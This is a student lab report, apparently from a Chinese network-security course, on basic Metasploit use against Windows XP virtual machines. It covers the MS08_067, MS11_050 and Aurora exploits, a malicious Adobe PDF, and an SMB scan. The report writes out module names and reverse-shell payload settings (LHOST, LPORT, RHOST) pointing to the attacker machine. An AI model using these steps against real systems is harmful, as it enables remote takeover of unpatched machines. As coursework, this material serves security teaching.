20155330 《网络对抗》 Exp5 MSF基础应用

实践过程记录

主动攻击实践:MS08_067漏洞攻击

  • 攻击机:kali

    • IP地址:192.168.124.132
  • 靶机:windows XP SP3 简体中文
    • IP地址:192.168.124.135
  • 输入命令use exploit/windows/smb/ms08_067_netapi
  • 设置参数
set payload generic/shell_reverse_tcptcp反向回连
set LHOST 192.168.124.132
set LPORT 5330 端口
set RHOST 192.168.124.135
set target 0
  • 并进行攻击exploit

  • 结果失败了。

  • 然后重新换了一台靶机windows XP SP3(English),重设了攻击目标地址。

  • 成功了,使用systeminfo查看靶机信息。

针对浏览器攻击:MS11-050漏洞攻击

  • 攻击机:kali

    • IP地址:192.168.124.132
  • 靶机:Windows XP Professional SP3 简体中文
    • IP地址:192.168.124.135
  • use windows/browser/ms11_050_mshtml_cobjectelement使用该模块
  • 加载payloadset payload windows/meterpreter/reverese_http,并设置相应参数,打开服务exploit,发起渗透攻击。

  • 在靶机中启动IE 7浏览器,访问链接:http://192.168.124.132:8080/ms5330

  • 但是在kali攻击机中一直出错,回连没有成功。
  • 然后参考组长的博客,将攻击的目标漏洞换成了MS10_002_aurora

针对浏览器攻击:MS10_002_aurora漏洞攻击

  • 攻击机:kali

    • IP地址:192.168.124.129
  • 靶机:Windows XP Professional SP3(English)
    • IP地址:192.168.124.136
  • 输入下图中的命令并执行攻击

  • 在靶机中启动IE 7浏览器,访问链接:http://192.168.124.132:8080/aurora.html

  • 本来是回连成功的,但是输入错了命令,然后只好重做了一遍。

  • 第二次生成了不同的网址

  • 回连成功后使用sysinfo查看靶机信息

  • 靶机ip地址

针对客户端的攻击:Adobe渗透测试

  • 攻击机:kali

    • IP地址:192.168.124.129
  • 靶机:Windows XP Professional SP3 简体中文
    • IP地址:192.168.124.135
  • 进入windows/fileformat/adobe_cooltype_sing模块设定相关系数并生成相关文件5330.pdf

  • 将生成的pdf文件导入到靶机中运行,回连成功!可对靶机进行操作。

  • 在靶机中关闭PDF文档后,攻击机与靶机断开连接。

辅助模块

  • 输入命令show auxiliary查看所有辅助模块

  • 选中其中一个模块进入。该模块是用于对smb的版本进行扫描,SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。。

  • 设置必要参数,并使用show options查看需要设置的消息

  • 使用命令run开启扫描,结果如下:

实验后回答问题

  • exploit

    • 攻击。简单来说就是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击。主要分为主动攻击和被动攻击。
  • payload

    • 攻击载荷。类似shellcode,在攻击渗透成功后对被感染计算机进行后门操作,达到攻击效果。
  • encode

    • 编码器。修改字符达到“免杀”目的。

实验感受

这次实验主要对Windows xp系统及其有关应用中的部分漏洞进行了攻击,从而也感受到了msf工具功能的强大。

20155330 《网络对抗》 Exp5 MSF基础应用的更多相关文章

  1. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  2. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  3. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  4. 2018-2019 20165220 网络对抗 Exp5 MSF基础

    实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...

  5. 2018-2019 20165219 网络对抗 Exp5 MSF基础

    实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...

  6. 20145338 《网络对抗》 MSF基础应用

    20145338<网络对抗> MSF基础应用 实验内容 ·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路. 具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击 ...

  7. 20145308 《网络对抗》 MSF基础应用 学习总结

    20145308 <网络对抗> MSF基础应用 学习总结 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...

  8. 20145326蔡馨熤《网络对抗》——MSF基础应用

    20145326蔡馨熤<网络对抗>——MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机 ...

  9. 20155218《网络对抗》MSF基础应用

    20155218<网络对抗>MSF基础应用 实验过程 1.一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞: show target 查看可以 ...

  10. 20155304《网络对抗》MSF基础应用

    20155304<网络对抗>MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_ ...

随机推荐

  1. objc与鸭子对象(上)

    这是<objc与鸭子对象>的上半部分,<objc与鸭子对象(下)>中介绍了鸭子类型的进阶用法.依赖注入以及demo. 我是前言 鸭子类型(Duck Type)即:“当看到一只鸟 ...

  2. C语言目录

    软件行业的很多细分学科都是都是基于C语言的,学习数据结构.算法.操作系统.编译原理等都离不开C语言. PHP.Python 等都是用C语言开发出来的,虽然平时做项目的时候看不到C语言的影子,但是如果想 ...

  3. Percona Xtradb Cluster的设计与实现

    Percona Xtradb Cluster的设计与实现   Percona Xtradb Cluster的实现是在原mysql代码上通过Galera包将不同的mysql实例连接起来,实现了multi ...

  4. IE8 下面通过滤镜的方式进行图片旋转

    首先,为什么我会提出这样的方式来进行操作呢?原因还是需求导致: 在做项目中,有这样一个需求,在进行网页中图片查看的时候,需要对图片的操作有支持旋转和缩放这些操作,看似这样的网上插件有很多,对!但是对于 ...

  5. MySQL crash-safe replication(3): MySQL的Crash Safe和Binlog的关系

    2016-12-23 17:29 宋利兵 作者:宋利兵 来源:MySQL代码研究(mysqlcode) 0.导读 本文重点介绍了InnoDB的crash safe和binlog之间的关系,以及2阶段提 ...

  6. 《SQL Server 2008从入门到精通》--20180716

    1.锁 当多个用户同时对同一个数据进行修改时会产生并发问题,使用事务就可以解决这个问题.但是为了防止其他用户修改另一个还没完成的事务中的数据,就需要在事务中用到锁. SQL Server 2008提供 ...

  7. ELK安装过程

    官方安装文档:https://www.elastic.co/guide/en/elasticsearch/reference/current/zip-targz.html 官方硬件和配置项推荐:htt ...

  8. 第 15 章 位操作(binbit)

    /*------------------------------------ binbit.c -- 使用位操作显示二进制 ------------------------------------*/ ...

  9. CreateEvent

    事件对象就像一个开关:它只有两种状态---开和关.当一个事件处于”开”状态,我们称其为”有信号”否则称为”无信号”.可以在一个线程的执行函数中创建一个事件对象,然后观察它的状态,如果是”无信号”就让该 ...

  10. T4学习- 4、Kalman Studio-T4代码生成器

    开源代码生成器-Kalman Studio https://github.com/loamen/Kalman.Studio 软件主要功能如下: 1.基于T4的代码生成工具,根据数据库元数据信息生成代码 ...